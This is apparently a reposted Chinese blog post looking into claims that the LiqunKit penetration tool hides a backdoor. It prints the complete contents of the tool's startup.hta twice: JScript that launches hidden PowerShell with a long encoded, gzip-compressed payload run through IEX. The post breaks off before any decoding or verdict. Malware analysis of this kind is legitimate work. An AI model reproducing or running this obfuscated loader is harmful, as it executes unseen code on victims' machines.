CTF导航 CTF导航

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

渗透技巧 2年前 (2021) admin
1,417 0 0

起因

不知咋的,群里突然发了些LiqunKit带病毒的截图,然后开始说有后门,异常流量什么的鬼..

刚好前一秒上土司也看到了这工具,

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?) 
项目地址 https://github.com/Liqunkit/LiqunKit_
powershell 解码分析の测试(他们说LiqunKit模块插件有后门?) powershell 解码分析の测试(他们说LiqunKit模块插件有后门?) powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

———————————————————————————————–

感觉有后门不太科学..而群里的截图也都是截至拉到微步、VT上扫描的截图

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

都没啥鸟用,张口就来的感觉;本来开发者提供了redis等的利用模块,这黑客工具不是一直都被监控报毒的吗?

下面是文件目录:

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

作者提供的模块处理redis其他都是文本..然后一堆人都说工具有后门,比如

startup.hta

打开内容如下:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0AWgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUAZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQATgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=");</SCRIPT>

有人就喷:

 -nop -w hidden -encodedcommand

我就特么想着还原一下不就知道了吗?况且你说人家有后门,就拿着微步/VT的结果嘟囔有啥鬼用?当然,万一有后门呢不是?

开始

原文:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0AWgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUAZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQATgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=");</SCRIPT>

